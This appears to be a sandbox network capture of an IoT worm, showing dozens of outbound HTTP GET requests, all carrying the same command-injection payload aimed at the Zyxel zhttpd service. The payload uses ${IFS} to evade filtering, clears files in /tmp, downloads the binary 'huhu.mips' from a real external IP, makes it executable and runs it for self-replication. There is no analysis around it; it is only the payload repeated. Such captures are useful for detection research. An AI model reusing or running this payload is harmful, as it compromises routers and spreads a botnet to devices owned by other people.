                                                Jan 29, 2024 07:07:46.305814028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3918192.168.2.2344716142.12.16.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.305881977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3919192.168.2.2338096220.236.66.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.305926085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3920192.168.2.234796237.36.135.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.306005955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3921192.168.2.2342718151.118.195.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.306108952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3922192.168.2.233977290.159.193.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.306149006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3923192.168.2.233732679.21.101.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.306193113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3924192.168.2.234854037.222.190.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.306267023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3925192.168.2.2348564103.39.230.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.306335926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3926192.168.2.233779049.39.57.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.306402922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3927192.168.2.2340548181.93.153.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.306442022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3928192.168.2.2339646156.216.54.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.306534052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3929192.168.2.2357424206.238.72.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.306577921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3930192.168.2.235074448.130.144.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.306632996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3931192.168.2.235330079.247.34.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.306694031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3932192.168.2.233673461.33.145.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.306757927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3933192.168.2.2345820159.109.113.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.306807041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3934192.168.2.2338736100.150.19.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.306849957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3935192.168.2.2354964181.132.243.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.306936026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3936192.168.2.234214870.97.67.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.306963921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3937192.168.2.2342542105.58.86.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.307013988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3938192.168.2.233924657.43.1.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.307075977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3939192.168.2.2351756179.232.9.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.307147026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3940192.168.2.2360924173.55.214.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.307194948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3941192.168.2.2341096139.184.196.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.307243109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3942192.168.2.2333154124.82.225.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.307291985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3943192.168.2.234309483.2.8.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.307356119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3944192.168.2.2359606134.62.61.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.307425976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3945192.168.2.233312451.233.38.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.307487011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3946192.168.2.2339278178.121.116.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.307554960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3947192.168.2.2339328118.139.62.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.307631016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3948192.168.2.2337534155.18.162.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.307672977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3949192.168.2.2342258218.12.11.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.307713032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3950192.168.2.2347062108.177.31.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.307774067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3951192.168.2.2334694220.133.153.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.307837009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3952192.168.2.2357480188.211.98.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.307872057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3953192.168.2.2336976179.50.12.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.307960033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3954192.168.2.2348294174.230.144.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.307993889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3955192.168.2.2344442211.32.194.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.308037996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3956192.168.2.233308418.62.13.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.308104992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3957192.168.2.233414419.125.34.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.308182001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3958192.168.2.235276666.197.93.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.308217049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3959192.168.2.2354980182.152.20.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.308291912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3960192.168.2.2351692193.5.254.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.308343887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3961192.168.2.2359854151.224.230.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.308383942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3962192.168.2.233836847.102.237.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.308490992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3963192.168.2.2347732210.29.197.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.308500051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3964192.168.2.2353488197.216.254.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.308571100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3965192.168.2.23519962.186.97.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.308634043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3966192.168.2.235921877.80.224.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.308707952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3967192.168.2.236012635.220.173.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.308747053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3968192.168.2.233373648.32.242.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.308834076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3969192.168.2.2349826115.105.28.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.308893919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3970192.168.2.2342872180.193.72.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.308953047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3971192.168.2.2346132136.104.177.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.309010983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3972192.168.2.2334560103.18.118.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.309057951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3973192.168.2.234988217.173.131.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.309108019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3974192.168.2.2354796134.84.231.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.309171915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3975192.168.2.2343120171.74.79.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.309228897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3976192.168.2.2350258135.166.0.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.309290886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3977192.168.2.234914691.212.0.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.309355974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3978192.168.2.234250480.36.154.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.309406042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3979192.168.2.234624666.56.85.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.309456110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3980192.168.2.2347576221.63.9.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.309525967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3981192.168.2.2335314147.53.106.93443
                                                TimestampBytes transferredDirectionData
